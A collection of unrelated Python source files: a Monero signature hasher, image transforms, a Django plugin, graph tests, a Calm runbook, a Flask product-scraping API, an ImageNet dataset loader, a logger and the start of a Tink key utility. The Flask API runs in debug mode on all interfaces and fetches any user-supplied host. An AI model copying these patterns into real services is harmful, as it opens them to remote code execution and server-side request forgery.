self.is_simple = state[0] if state else None
self.state = state[1] if state else 0
self.kc_master = HashWrapper(state[2] if state else crypto.get_keccak())
self.rsig_hasher = state[3] if state else crypto.get_keccak()
self.rtcsig_hasher = None
if state:
self.rtcsig_hasher = KeccakXmrArchive(state[4]) if state[4] else None
else:
self.rtcsig_hasher = KeccakXmrArchive()
def state_save(self):
return (
self.is_simple,
self.state,
self.kc_master.ctx,
self.rsig_hasher,
self.rtcsig_hasher.ctx() if self.rtcsig_hasher else None,
)
def state_load(self, x):
from monero_glue.xmr.sub.keccak_hasher import HashWrapper, KeccakXmrArchive
self.is_simple = x[0]
self.state = x[1]
self.kc_master = HashWrapper(x[2])
self.rsig_hasher = x[3]
if x[4]:
self.rtcsig_hasher = KeccakXmrArchive(x[4])
else:
self.rtcsig_hasher = None
def init(self, is_simple):
if self.state != 0:
raise ValueError("State error")
self.state = 1
self.is_simple = is_simple
async def set_message(self, message):
self.kc_master.update(message)
async def set_type_fee(self, rv_type, fee):
if self.state != 1:
raise ValueError("State error")
self.state = 2
from monero_serialize.xmrtypes import RctSigBase
rfields = RctSigBase.f_specs()
await self.rtcsig_hasher.message_field(None, field=rfields[0], fvalue=rv_type)
await self.rtcsig_hasher.message_field(None, field=rfields[1], fvalue=fee)
async def set_pseudo_out(self, out):
if self.state != 2 and self.state != 3:
raise ValueError("State error")
self.state = 3
from monero_serialize.xmrtypes import KeyV
await self.rtcsig_hasher.field(out, KeyV.ELEM_TYPE)
async def set_ecdh(self, ecdh, raw=True):
if self.state != 2 and self.state != 3 and self.state != 4:
raise ValueError("State error")
self.state = 4
if raw:
await self.rtcsig_hasher.buffer(ecdh)
else:
from monero_serialize.xmrtypes import EcdhInfo
await self.rtcsig_hasher.field(ecdh, EcdhInfo.ELEM_TYPE)
async def set_out_pk(self, out_pk, mask=None):
if self.state != 4 and self.state != 5:
raise ValueError("State error")
self.state = 5
from monero_serialize.xmrtypes import ECKey
await self.rtcsig_hasher.field(mask if mask else out_pk, ECKey)
async def rctsig_base_done(self):
if self.state != 5:
raise ValueError("State error")
self.state = 6
c_hash = self.rtcsig_hasher.get_digest()
self.kc_master.update(c_hash)
self.rtcsig_hasher = None
async def rsig_val(self, p, bulletproof, raw=False):
if self.state == 8:
raise ValueError("State error")
if raw:
if isinstance(p, list):
for x in p:
self.rsig_hasher.update(x)
else:
self.rsig_hasher.update(p)
return
if bulletproof:
self.rsig_hasher.update(p.A)
self.rsig_hasher.update(p.S)
self.rsig_hasher.update(p.T1)
self.rsig_hasher.update(p.T2)
self.rsig_hasher.update(p.taux)
self.rsig_hasher.update(p.mu)
for i in range(len(p.L)):
self.rsig_hasher.update(p.L[i])
for i in range(len(p.R)):
self.rsig_hasher.update(p.R[i])
self.rsig_hasher.update(p.a)
self.rsig_hasher.update(p.b)
self.rsig_hasher.update(p.t)
else:
for i in range(64):
self.rsig_hasher.update(p.asig.s0[i])
for i in range(64):
self.rsig_hasher.update(p.asig.s1[i])
self.rsig_hasher.update(p.asig.ee)
for i in range(64):
self.rsig_hasher.update(p.Ci[i])
async def get_digest(self):
if self.state != 6:
raise ValueError("State error")
self.state = 8
c_hash = self.rsig_hasher.digest()
self.rsig_hasher = None
self.kc_master.update(c_hash)
return self.kc_master.digest()
async def get_pre_mlsag_hash(rv):
"""
Generates final message for the Ring CT signature
:param rv:
:type rv: RctSig
:return:
"""
from monero_glue.xmr.sub.keccak_hasher import get_keccak_writer
from monero_serialize.xmrtypes import RctType
kc_master = HashWrapper(crypto.get_keccak())
kc_master.update(rv.message)
is_simple = rv.type in [RctType.Simple, RctType.Bulletproof, RctType.Bulletproof2]
outputs = len(rv.ecdhInfo)
inputs = 0
if rv.type == RctType.Simple:
inputs = len(rv.pseudoOuts)
elif rv.type in [RctType.Bulletproof, RctType.Bulletproof2]:
inputs = len(rv.p.pseudoOuts)
kwriter = get_keccak_writer()
ar = xmrserialize.Archive(kwriter, True)
await rv.serialize_rctsig_base(ar, inputs, outputs)
c_hash = kwriter.get_digest()
kc_master.update(c_hash)
kc = crypto.get_keccak()
if rv.type in [RctType.Bulletproof, RctType.Bulletproof2]:
for p in rv.p.bulletproofs:
kc.update(p.A)
kc.update(p.S)
kc.update(p.T1)
kc.update(p.T2)
kc.update(p.taux)
kc.update(p.mu)
for i in range(len(p.L)):
kc.update(p.L[i])
for i in range(len(p.R)):
kc.update(p.R[i])
kc.update(p.a)
kc.update(p.b)
kc.update(p.t)
else:
for r in rv.p.rangeSigs:
for i in range(64):
kc.update(r.asig.s0[i])
for i in range(64):
kc.update(r.asig.s1[i])
kc.update(r.asig.ee)
for i in range(64):
kc.update(r.Ci[i])
c_hash = kc.digest()
kc_master.update(c_hash)
return kc_master.digest()
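# A sketch of the expected call order for PreMlsagHasher, inferred from the
# state checks above (the transaction values named here are placeholders):
#
#   hasher = PreMlsagHasher()
#   hasher.init(is_simple=True)
#   await hasher.set_message(tx_prefix_hash)
#   await hasher.set_type_fee(rv_type, fee)
#   await hasher.set_pseudo_out(pseudo_out)   # per input, simple/bulletproof types
#   await hasher.set_ecdh(ecdh_info)          # per output
#   await hasher.set_out_pk(out_pk)           # per output
#   await hasher.rctsig_base_done()
#   await hasher.rsig_val(rsig, bulletproof=True)
#   pre_mlsag_hash = await hasher.get_digest()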
|
#
# Author: Daniel Dittenhafer
#
# Created: Nov 3, 2016
#
# Description: Image Transformations for faces
#
# An example of each transformation can be found here: https://github.com/dwdii/emotional-faces/tree/master/data/transformed
#
__author__ = 'Daniel Dittenhafer'
import os
import numpy as np
from scipy import misc
from scipy import ndimage
import cv2
def saveImg(destinationPath, prefix, filepath, imgData):
"""Helper function to enable a common way of saving the transformed images."""
fileName = os.path.basename(filepath)
    destFile = os.path.join(destinationPath, prefix + "-" + fileName)
misc.imsave(destFile, imgData)
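# A minimal usage sketch (file paths are illustrative; misc.imread comes from
# the same legacy SciPy API this module already relies on):
#
#   img = misc.imread('faces/face001.png')
#   saveImg('transformed', 'rotate5', 'faces/face001.png', rotate5(img))
#   saveImg('transformed', 'erode', 'faces/face001.png', cvErode(img))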
def reflectY(img):
tx = [[1, 0], [0, -1]]
offset = [0, 350]
img2 = ndimage.interpolation.affine_transform(img, tx, offset)
return img2
def rotate5(img):
img2 = cv2.resize(img, (385, 385), interpolation=cv2.INTER_AREA)
# Rotate
a = 5.0 * np.pi / 180.0
tx = [[np.cos(a),np.sin(a)],[-np.sin(a),np.cos(a)]]
offset = [-10,25] # [right, down] negatives go other direction
img2 = ndimage.interpolation.affine_transform(img2, tx, offset)
# Zoom
img2 = img2[10:360, 10:360]
return img2
def cvErode(img):
"""https://www.packtpub.com/mapt/book/application-development/9781785283932/3/ch03lvl1sec32/Cartoonizing+an+image"""
kernel = np.ones((5, 5), np.uint8)
img_erosion = cv2.erode(img, kernel, iterations=1)
return img_erosion
def cvDilate(img):
"""https://www.packtpub.com/mapt/book/application-development/9781785283932/3/ch03lvl1sec32/Cartoonizing+an+image"""
kernel = np.ones((5, 5), np.uint8)
img_dilation = cv2.dilate(img, kernel, iterations=1)
return img_dilation
def cvDilate2(img):
"""https://www.packtpub.com/mapt/book/application-development/9781785283932/3/ch03lvl1sec32/Cartoonizing+an+image"""
kernel = np.ones((5, 5), np.uint8)
img_dilation = cv2.dilate(img, kernel, iterations=2)
return img_dilation
def cvMedianBlur(img):
"""https://www.packtpub.com/mapt/book/application-development/9781785283932/3/ch03lvl1sec32/Cartoonizing+an+image"""
img2 = cv2.medianBlur(img, 7 )
return img2
def cvExcessiveSharpening(img):
"""https://www.packtpub.com/mapt/book/application-development/9781785283932/2/ch02lvl1sec22/Sharpening"""
kernel_sharpen_1 = np.array([[1, 1, 1], [1, -7, 1], [1, 1, 1]])
img2 = cv2.filter2D(img, -1, kernel_sharpen_1)
return img2
def cvEdgeEnhancement(img):
"""https://www.packtpub.com/mapt/book/application-development/9781785283932/2/ch02lvl1sec22/Sharpening"""
kernel_sharpen_3 = np.array([[-1, -1, -1, -1, -1],
[-1, 2, 2, 2, -1],
[-1, 2, 8, 2, -1],
[-1, 2, 2, 2, -1],
[-1, -1, -1, -1, -1]]) / 8.0
img2 = cv2.filter2D(img, -1, kernel_sharpen_3)
return img2
def cvBlurMotion1(img):
"""https://www.packtpub.com/mapt/book/application-development/9781785283932/2/ch02lvl1sec23/Embossing"""
size = 15
kernel_motion_blur = np.zeros((size, size))
kernel_motion_blur[int((size - 1) / 2), :] = np.ones(size)
kernel_motion_blur = kernel_motion_blur / size
img2 = cv2.filter2D(img, -1, kernel_motion_blur)
return img2
def cvBlurMotion2(img):
"""https://www.packtpub.com/mapt/book/application-development/9781785283932/2/ch02lvl1sec23/Embossing"""
size = 30
kernel_motion_blur = np.zeros((size, size))
kernel_motion_blur[int((size - 1) / 2), :] = np.ones(size)
kernel_motion_blur = kernel_motion_blur / size
img2 = cv2.filter2D(img, -1, kernel_motion_blur)
return img2 |
from django.utils.translation import ugettext_lazy as _
from fluent_contents.extensions import plugin_pool, ContentPlugin
from .models import ContactPersonItem
@plugin_pool.register
class ContactPersonPlugin(ContentPlugin):
model = ContactPersonItem
raw_id_fields = ('contact', )
render_template = 'icekit/plugins/contact_person/default.html'
category = _('Assets')
|
import unittest
import numpy as np
import torch
from kcd.kcd import KCD
from graphio.graphio import GraphIO
from graphutils.graphutils import GraphUtils
from glob import glob
import os.path
import re
class TestMutliArange(unittest.TestCase):
def test_numpy(self):
print("Testing Multi-arange Function in Numpy ...")
s = np.array([2, 6, 0, 6, 10, 13, 0, 2, 10, 13, 2, 6, 13, 2, 6, 10], dtype=np.uint32)
c = np.array([4, 4, 2, 4, 3, 3, 2, 4, 3, 3, 4, 4, 3, 4, 4, 3], dtype=np.uint32)
e = np.array([2, 3, 4, 5, 6, 7, 8, 9, 0, 1, 6, 7, 8, 9, 10, 11, 12,
13, 14, 15, 0, 1, 2, 3, 4, 5, 10, 11, 12, 13, 14, 15, 2, 3,
4, 5, 6, 7, 8, 9, 13, 14, 15, 2, 3, 4, 5, 6, 7, 8, 9,
10, 11, 12], dtype=np.uint32)
m = GraphUtils.multi_arange_numpy(s, c)
np.testing.assert_array_equal(m, e)
st = torch.from_numpy(s.astype(np.int64))
ct = torch.from_numpy(c.astype(np.int64))
et = torch.from_numpy(e.astype(np.int64))
mt = GraphUtils.multi_arange_torch_ex(st, ct, 'cpu') # mt.data.numpy()
self.assertTrue(torch.all(torch.eq(mt, et)))
class TestIO(unittest.TestCase):
def test_read_txt(self):
print("Testing IO Functions ...")
for ig in glob("./datasets/sample_input_graph_*.txt"):
kcd = KCD(ig)
g = GraphIO.reconstruct_original_edge_list(kcd.N, kcd.D, kcd.I)
# Load text file and do pre-processing
arr_txt = np.loadtxt(ig, dtype=kcd.gio.dtype, comments="#")
src, dst = GraphIO.remove_self_loops(arr_txt[:, 0], arr_txt[:, 1])
src, dst = GraphIO.directed_to_undirected(src, dst)
sort_perm = np.lexsort((dst, src))
src = src[sort_perm]
dst = dst[sort_perm]
el = GraphIO.merge(src, dst)
self.assertEqual(g.dtype, el.dtype)
np.testing.assert_array_equal(g, el)
def test_serialize(self):
print("Testing Serialization ...")
for ig in glob("./datasets/sample_input_graph_*.txt"):
base_path, ext = os.path.splitext(ig)
kcd_txt = KCD(ig,
skip_prepare=False,
mode="numpy",
serialize="h5",
serialize_prepared=False)
kcd_h5 = KCD(base_path + ".h5",
skip_prepare=False,
mode="numpy",
serialize="mtx",
serialize_prepared=False)
kcd_mtx = KCD(base_path + ".mtx",
skip_prepare=False,
mode="numpy",
serialize="npz",
serialize_prepared=False)
kcd_npz = KCD(base_path + ".npz",
skip_prepare=False,
mode="numpy",
serialize="none",
serialize_prepared=False)
g_txt = GraphIO.reconstruct_original_edge_list(kcd_txt.N, kcd_txt.D, kcd_txt.I)
g_h5 = GraphIO.reconstruct_original_edge_list(kcd_h5.N, kcd_h5.D, kcd_h5.I)
g_mtx = GraphIO.reconstruct_original_edge_list(kcd_mtx.N, kcd_mtx.D, kcd_mtx.I)
g_npz = GraphIO.reconstruct_original_edge_list(kcd_npz.N, kcd_npz.D, kcd_npz.I)
np.testing.assert_array_equal(g_txt, g_h5)
np.testing.assert_array_equal(g_txt, g_mtx)
np.testing.assert_array_equal(g_txt, g_npz)
class TestKCDAlgorithms(unittest.TestCase):
def test_original_numpy_algorithms(self):
print("Testing KCD on Numpy Platform ...")
for ig in glob("./datasets/sample_input_graph_*.txt"):
kcd = KCD(ig, mode="numpy")
kcd.run()
# Load output
og = re.sub("sample_input", "expected_output_kcore", ig)
arr_txt = np.loadtxt(og, dtype=kcd.gio.dtype, comments="#")
self.assertEqual(kcd.K.dtype, arr_txt.dtype)
np.testing.assert_array_equal(kcd.K, arr_txt[:, 1])
def test_original_torch_algorithms(self):
print("Testing KCD on Torch platform ...")
for ig in glob("./datasets/sample_input_graph_*.txt"):
kcd = KCD(ig, mode="torch-cpu")
kcd.run()
# Load output
og = re.sub("sample_input", "expected_output_kcore", ig)
arr_txt = np.loadtxt(og, dtype=kcd.gio.dtype, comments="#")
self.assertEqual(kcd.K.dtype, arr_txt.dtype)
np.testing.assert_array_equal(kcd.K, arr_txt[:, 1])
if __name__ == '__main__':
unittest.main()
|
"""
Calm Runbook Sample for set variable task
"""
import os
from calm.dsl.runbooks import runbook, ref
from calm.dsl.runbooks import RunbookTask as Task
from calm.dsl.runbooks import CalmEndpoint as Endpoint
@runbook
def DslSetVariableRunbook():
"Runbook example with Set Variable Tasks"
Task.SetVariable.escript(name="Task1", filename=os.path.join("scripts", "set_variable_task1_script.py"), variables=["var1"])
Task.SetVariable.ssh(
name="Task2", filename=os.path.join("scripts", "set_variable_task2_script.sh"), variables=["var2"], target=ref(Endpoint.use_existing("linux_bedag"))
)
Task.Exec.escript(name="Task3", script="print '@@{var1}@@ @@{var2}@@'")
|
# coding: utf-8
# main.py the api core
# Created by S4n1x-d4rk3r
from bs4 import BeautifulSoup
from flask import Flask, jsonify, request
import requests, sqlite3
from hashlib import md5
from datetime import datetime
import time
conn = sqlite3.connect('./flashit.db')
c = conn.cursor()
c.execute('create table if not exists ping (code string, percent string, price string, search string, _date string, not_contain string, must_contain string, category string)')
conn.commit()
c.close()
app = Flask(__name__)
app.config['Secret'] = "Secret"
def getElts(response):
    # Extract the product result links from a requests.Response object.
    data = response.text
    soup = BeautifulSoup(data, features="lxml")
    list_results = soup.find_all("a", {"class": "link"})
    return list_results
def only_numbers(string_):
    if string_ is None:
return "0"
else:
return ''.join([i for i in string_ if i.isdigit()])
def MD5(block_string):
return md5(block_string.encode()).hexdigest()
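# Example query against the /flash endpoint (host and filter values are
# illustrative): discounts of at least 30% over 3 result pages, keeping items
# that mention "hp" and skipping cases/covers.
#
#   GET /flash?host=https://www.jumia.cm&find=laptop&percent=30&level=3
#       &must_contain=hp&not_contain=case,cover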
@app.route('/', methods=['GET']) # To prevent Cors issues
def index1():
# Sent in GET requests
# Build the response
response = jsonify({ 'status':'success', 'message': 'Welcome to Flash API.' })
# Let's allow all Origin requests
response.headers.add('Access-Control-Allow-Origin', '*') # To prevent Cors issues
return response
@app.route('/flash', methods=['GET']) # To prevent Cors issues
def index2():
# Let's protect the main api from crashing
#try:
print("[+] Fetching results...")
# Sent in GET requests
host = request.args.get('host')
find = str(request.args.get('find')).replace(" ", "+")
try: percent = request.args.get('percent')
except Exception as es: percent = "0"
try: level = int(request.args.get('level'))
except Exception as es: level = 5
try: category = request.args.get('category')
except Exception as es: category = "0"
try: price = request.args.get('price')
except Exception as es: price = "0"
try: job = request.args.get('job')
except Exception as es: job = None
not_contain = request.args.get('not_contain').split(",")
must_contain = request.args.get('must_contain').split(",")
print("[+] not_contain: ", not_contain)
print("[+] must_contain: ", must_contain)
code = ""
results_size = 0
json_results = []
percent_classes = ["sale-flag-percent"]
price_classes = ["price"]
for i in range(1, level):
time.sleep(1)
search = host+"/catalog/?q="+find+"&page="+str(i)
if category != "0": search = category.replace("https://www.jumia.cm", host+"/")+"&page="+str(i)
print("[+] search: ", search)
results = getElts(requests.get(search))
results_size += len(results)
for result in results:
print("[+] ---------------------------------- ")
print("[+] - Href: "+result["href"])
children = result.findChildren("span" , recursive=True)
for child in children:
try:
# print("[+] result.text: ", result.text)
# print("[+] price: ", price)
# print("[+] percent: ", percent)
# print("[+] child['class'][0]: ", child['class'][0])
# print("[+] percent_classes: ", percent_classes)
# print("[+] child['class'][0] in percent_classes: ", (child["class"][0] in percent_classes))
# print("[+] float(percent): ", float(percent))
# print("[+] child.text: ", child.text)
# print("[+] (only_numbers(child.text)): ", (only_numbers(child.text)))
# print("[+] float(only_numbers(child.text)): ", float(only_numbers(child.text)))
# print("[+] any(ext.lower() in result.text.lower() for ext in not_contain): ", any(ext.lower() in result.text.lower() for ext in not_contain))
if (
price == "0" and percent != "0" and
child["class"][0] in percent_classes and
float(percent) <= float(only_numbers(child.text)) and
not any(ext.lower() in result.text.lower() for ext in not_contain) and
any(ext.lower() in result.text.lower() for ext in must_contain)):
json_results.append({
"title": str(result.text),
"href": str(result["href"]),
"percent": float(only_numbers(child.text)),
"price": 0
})
elif(
price != "0" and percent == "0" and
child["class"][0] == "price" and
"-old" not in child["class"] and
not any(ext.lower() in result.text.lower() for ext in not_contain) and
any(ext.lower() in result.text.lower() for ext in must_contain)):
product_price = int(child.findChildren("span" , recursive=True)[0]["data-price"])
if (
child["class"][0] in price_classes and
float(price.split("-")[1]) > float(product_price)):
json_results.append({
"title": str(result.text),
"href": str(result["href"]),
"percent": 0,
"price": product_price
})
elif(price == "0" and percent == "0" and
not any(ext.lower() in result.text.lower() for ext in not_contain) and
any(ext.lower() in result.text.lower() for ext in must_contain)):
json_results.append({
"title": str(result.text),
"href": str(result["href"]),
"percent": 0,
"price": int(child.findChildren("span" , recursive=True)[0]["data-price"])
})
except Exception as es: pass
i = i + 1
json_results = sorted(json_results, key=lambda k: k['price'])[::-1]
if price == "0": json_results = sorted(json_results, key=lambda k: k['percent'])[::-1]
    if (len(json_results) == 0 and job is None):
must_contain = ','.join(must_contain)
not_contain = ','.join(not_contain)
code = str(MD5(search))[:10]
_date = (str(datetime.now())).split('.')[0]
print("[+] > code:{}, percent:{}, search:{}, date:{}, not_contain:{}, must_contain:{}, category:{}".format(code, percent, search.split("&")[0], _date, not_contain, must_contain, category))
conn = sqlite3.connect('./flashit.db')
c = conn.cursor()
c.execute('INSERT INTO ping VALUES (?,?,?,?,?,?,?,?)', (code, percent, price, search.split("&")[0], _date, not_contain, must_contain, category))
conn.commit()
c.close()
# Build the response
response = jsonify({'status':'success', 'code':code, 'fetched': str(results_size)+' fetched', 'filtered': str(len(json_results))+' filtered', "results": json_results })
# except Exception as es:
    # print("[+] Oops, some error occurred!", str(es))
    # response = jsonify({'status':'error', 'message':"Your request caused an unexpected error on the server"})
# Let's allow all Origin requests
response.headers.add('Access-Control-Allow-Origin', '*') # To prevent Cors issues
return response
if __name__ == "__main__":
app.run(host='0.0.0.0', debug=True, port=7777) |
import io
import pathlib
import re
from typing import Any, Callable, Dict, List, Optional, Tuple, cast
import torch
from torchdata.datapipes.iter import IterDataPipe, LineReader, IterKeyZipper, Mapper, TarArchiveReader, Filter, Shuffler
from torchvision.prototype.datasets.utils import (
Dataset,
DatasetConfig,
DatasetInfo,
OnlineResource,
ManualDownloadResource,
DatasetType,
)
from torchvision.prototype.datasets.utils._internal import (
INFINITE_BUFFER_SIZE,
BUILTIN_DIR,
path_comparator,
Enumerator,
getitem,
read_mat,
)
from torchvision.prototype.features import Label, DEFAULT
from torchvision.prototype.utils._internal import FrozenMapping
class ImageNetResource(ManualDownloadResource):
def __init__(self, **kwargs: Any) -> None:
super().__init__("Register on https://image-net.org/ and follow the instructions there.", **kwargs)
class ImageNetLabel(Label):
wnid: Optional[str]
@classmethod
def _parse_meta_data(
cls,
category: Optional[str] = DEFAULT, # type: ignore[assignment]
wnid: Optional[str] = DEFAULT, # type: ignore[assignment]
) -> Dict[str, Tuple[Any, Any]]:
return dict(category=(category, None), wnid=(wnid, None))
class ImageNet(Dataset):
def _make_info(self) -> DatasetInfo:
name = "imagenet"
categories, wnids = zip(*DatasetInfo.read_categories_file(BUILTIN_DIR / f"{name}.categories"))
return DatasetInfo(
name,
type=DatasetType.IMAGE,
dependencies=("scipy",),
categories=categories,
homepage="https://www.image-net.org/",
valid_options=dict(split=("train", "val", "test")),
extra=dict(
wnid_to_category=FrozenMapping(zip(wnids, categories)),
category_to_wnid=FrozenMapping(zip(categories, wnids)),
sizes=FrozenMapping(
[
(DatasetConfig(split="train"), 1_281_167),
(DatasetConfig(split="val"), 50_000),
(DatasetConfig(split="test"), 100_000),
]
),
),
)
def supports_sharded(self) -> bool:
return True
@property
def category_to_wnid(self) -> Dict[str, str]:
return cast(Dict[str, str], self.info.extra.category_to_wnid)
@property
def wnid_to_category(self) -> Dict[str, str]:
return cast(Dict[str, str], self.info.extra.wnid_to_category)
_IMAGES_CHECKSUMS = {
"train": "b08200a27a8e34218a0e58fde36b0fe8f73bc377f4acea2d91602057c3ca45bb",
"val": "c7e06a6c0baccf06d8dbeb6577d71efff84673a5dbdd50633ab44f8ea0456ae0",
"test_v10102019": "9cf7f8249639510f17d3d8a0deb47cd22a435886ba8e29e2b3223e65a4079eb4",
}
def resources(self, config: DatasetConfig) -> List[OnlineResource]:
name = "test_v10102019" if config.split == "test" else config.split
images = ImageNetResource(file_name=f"ILSVRC2012_img_{name}.tar", sha256=self._IMAGES_CHECKSUMS[name])
devkit = ImageNetResource(
file_name="ILSVRC2012_devkit_t12.tar.gz",
sha256="b59243268c0d266621fd587d2018f69e906fb22875aca0e295b48cafaa927953",
)
return [images, devkit]
_TRAIN_IMAGE_NAME_PATTERN = re.compile(r"(?P<wnid>n\d{8})_\d+[.]JPEG")
def _collate_train_data(self, data: Tuple[str, io.IOBase]) -> Tuple[ImageNetLabel, Tuple[str, io.IOBase]]:
path = pathlib.Path(data[0])
wnid = self._TRAIN_IMAGE_NAME_PATTERN.match(path.name).group("wnid") # type: ignore[union-attr]
category = self.wnid_to_category[wnid]
label = ImageNetLabel(self.categories.index(category), category=category, wnid=wnid)
return label, data
_VAL_TEST_IMAGE_NAME_PATTERN = re.compile(r"ILSVRC2012_(val|test)_(?P<id>\d{8})[.]JPEG")
def _val_test_image_key(self, data: Tuple[str, Any]) -> int:
path = pathlib.Path(data[0])
return int(self._VAL_TEST_IMAGE_NAME_PATTERN.match(path.name).group("id")) # type: ignore[union-attr]
def _collate_val_data(
self, data: Tuple[Tuple[int, int], Tuple[str, io.IOBase]]
) -> Tuple[ImageNetLabel, Tuple[str, io.IOBase]]:
label_data, image_data = data
_, label = label_data
category = self.categories[label]
wnid = self.category_to_wnid[category]
return ImageNetLabel(label, category=category, wnid=wnid), image_data
def _collate_test_data(self, data: Tuple[str, io.IOBase]) -> Tuple[None, Tuple[str, io.IOBase]]:
return None, data
def _collate_and_decode_sample(
self,
data: Tuple[Optional[ImageNetLabel], Tuple[str, io.IOBase]],
*,
decoder: Optional[Callable[[io.IOBase], torch.Tensor]],
) -> Dict[str, Any]:
label, (path, buffer) = data
return dict(
path=path,
image=decoder(buffer) if decoder else buffer,
label=label,
)
def _make_datapipe(
self,
resource_dps: List[IterDataPipe],
*,
config: DatasetConfig,
decoder: Optional[Callable[[io.IOBase], torch.Tensor]],
) -> IterDataPipe[Dict[str, Any]]:
images_dp, devkit_dp = resource_dps
if config.split == "train":
# the train archive is a tar of tars
dp = TarArchiveReader(images_dp)
dp = Shuffler(dp, buffer_size=INFINITE_BUFFER_SIZE)
dp = Mapper(dp, self._collate_train_data)
elif config.split == "val":
devkit_dp = Filter(devkit_dp, path_comparator("name", "ILSVRC2012_validation_ground_truth.txt"))
devkit_dp = LineReader(devkit_dp, return_path=False)
devkit_dp = Mapper(devkit_dp, int)
devkit_dp = Enumerator(devkit_dp, 1)
devkit_dp = Shuffler(devkit_dp, buffer_size=INFINITE_BUFFER_SIZE)
dp = IterKeyZipper(
devkit_dp,
images_dp,
key_fn=getitem(0),
ref_key_fn=self._val_test_image_key,
buffer_size=INFINITE_BUFFER_SIZE,
)
dp = Mapper(dp, self._collate_val_data)
else: # config.split == "test"
dp = Shuffler(images_dp, buffer_size=INFINITE_BUFFER_SIZE)
dp = Mapper(dp, self._collate_test_data)
return Mapper(dp, self._collate_and_decode_sample, fn_kwargs=dict(decoder=decoder))
# Although the WordNet IDs (wnids) are unique, the corresponding categories are not. For example, both n02012849
# and n03126707 are labeled 'crane' while the first means the bird and the latter means the construction equipment
_WNID_MAP = {
"n03126707": "construction crane",
"n03710721": "tank suit",
}
def _generate_categories(self, root: pathlib.Path) -> List[Tuple[str, ...]]:
resources = self.resources(self.default_config)
devkit_dp = resources[1].load(root / self.name)
devkit_dp = Filter(devkit_dp, path_comparator("name", "meta.mat"))
meta = next(iter(devkit_dp))[1]
synsets = read_mat(meta, squeeze_me=True)["synsets"]
categories_and_wnids = cast(
List[Tuple[str, ...]],
[
(self._WNID_MAP.get(wnid, category.split(",", 1)[0]), wnid)
for _, wnid, category, _, num_children, *_ in synsets
# if num_children > 0, we are looking at a superclass that has no direct instance
if num_children == 0
],
)
categories_and_wnids.sort(key=lambda category_and_wnid: category_and_wnid[1])
return categories_and_wnids
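# A minimal usage sketch (the `load` entry point is assumed from the prototype
# datasets API at the time of writing and may differ between torchvision versions):
#
#   from torchvision.prototype import datasets
#   dataset = datasets.load("imagenet", split="val")
#   sample = next(iter(dataset))
#   print(sample["path"], sample["label"])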
|
#!/usr/bin/env python3
class LogStats():
def __init__(self):
self.reset()
def reset(self):
self.data_accum = []
self.data_averages = []
def log_data(self, data):
self.data_accum.append(data)
def log_average(self):
total = 0
for l in self.data_accum:
total += l
length = len(self.data_accum)
self.data_accum = []
self.data_averages.append(total / length)
def get_averages(self):
return self.data_averages
def test_log_stats():
log_stats = LogStats()
log_stats.log_data(1)
log_stats.log_data(2)
log_stats.log_data(3)
log_stats.log_average()
log_stats.log_data(2)
log_stats.log_data(3)
log_stats.log_data(4)
log_stats.log_average()
averages = log_stats.get_averages()
assert averages[0] == 2,"Incorrect average calculated!"
assert averages[1] == 3,"Incorrect average calculated!"
if __name__ == "__main__":
test_log_stats() |
# Copyright 2020 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License")
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
r"""Custom Text-format functions for Tink Keys, Keysets and Key Templates.
Tink keys contain a serialized proto. Because we don't use any proto, the
text output of the proto library is not helpful. The function
key_util.text_format(msg: message.Message)
is similar to text_format.MessageToString(msg), but additionally outputs the
parsed serialized proto as a comment, which makes the proto human readable
while keeping it machine readable. For example, the AES128_EAX template
looks like this:
type_url: "type.googleapis.com/google.crypto.tink.AesEaxKey"
# value: [type.googleapis.com/google.crypto.tink.AesEaxKeyFormat] {
# params {
# iv_size: 16
# }
# key_size: 16
# }
value: "\n\002\010\020\020\020"
output_prefix_type: TINK
The function
assert_tink_proto_equal(self, a: message.Message, b: message.Message)
can be used in tests to assert that two protos are equal. If they are
not equal, the function tries to output a meaningful error message.
"""
from typing import Any, Optional
from google.protobuf import descriptor
from google.protobuf import message
from google.protobuf import text_encoding
from tink.proto import aes_cmac_pb2
from tink.proto import aes_cmac_prf_pb2
from tink.proto import aes_ctr_hmac_aead_pb2
from tink.proto import aes_ctr_hmac_streaming_pb2
from tink.proto import aes_eax_pb2
from tink.proto import aes_gcm_hkdf_streaming_pb2
from tink.proto import aes_gcm_pb2
from tink.proto import aes_gcm_siv_pb2
from tink.proto import aes_siv_pb2
from tink.proto import chacha20_poly1305_pb2
from tink.proto import ecdsa_pb2
from tink.proto import ecies_aead_hkdf_pb2
from tink.proto import ed25519_pb2
from tink.proto import hkdf_prf_pb2
from tink.proto import hmac_pb2
from tink.proto import hmac_prf_pb2
from tink.proto import jwt_ecdsa_pb2
from tink.proto import jwt_hmac_pb2
from tink.proto import jwt_rsa_ssa_pkcs1_pb2
from tink.proto import jwt_rsa_ssa_pss_pb2
from tink.proto import kms_aead_pb2
from tink.proto import kms_envelope_pb2
from tink.proto import rsa_ssa_pkcs1_pb2
from tink.proto import rsa_ssa_pss_pb2
from tink.proto import xchacha20_poly1305_pb2
TYPE_STRING = 9
TYPE_MESSAGE = 11
TYPE_BYTES = 12
TYPE_ENUM = 14
LABEL_REPEATED = 3
TYPE_PREFIX = 'type.googleapis.com/'
class KeyProto:
"""A map from type URLs to key protos and key format protos."""
_from_url = {}
_format_from_url = {}
@classmethod
def from_url(cls, type_url: str) -> Any:
return cls._from_url[type_url]
@classmethod
def format_from_url(cls, type_url: str) -> Any:
return cls._format_from_url[type_url]
@classmethod
def add_key_type(cls, key_type: Any, key_format_type: Any):
type_url = TYPE_PREFIX + key_type.DESCRIPTOR.full_name
cls._from_url[type_url] = key_type
cls._format_from_url[type_url] = key_format_type
KeyProto.add_key_type(aes_eax_pb2.AesEaxKey, aes_eax_pb2.AesEaxKeyFormat)
KeyProto.add_key_type(aes_gcm_pb2.AesGcmKey, aes_gcm_pb2.AesGcmKeyFormat)
KeyProto.add_key_type(aes_gcm_siv_pb2.AesGcmSivKey,
aes_gcm_siv_pb2.AesGcmSivKeyFormat)
KeyProto.add_key_type(aes_ctr_hmac_aead_pb2.AesCtrHmacAeadKey,
aes_ctr_hmac_aead_pb2.AesCtrHmacAeadKeyFormat)
KeyProto.add_key_type(chacha20_poly1305_pb2.ChaCha20Poly1305Key,
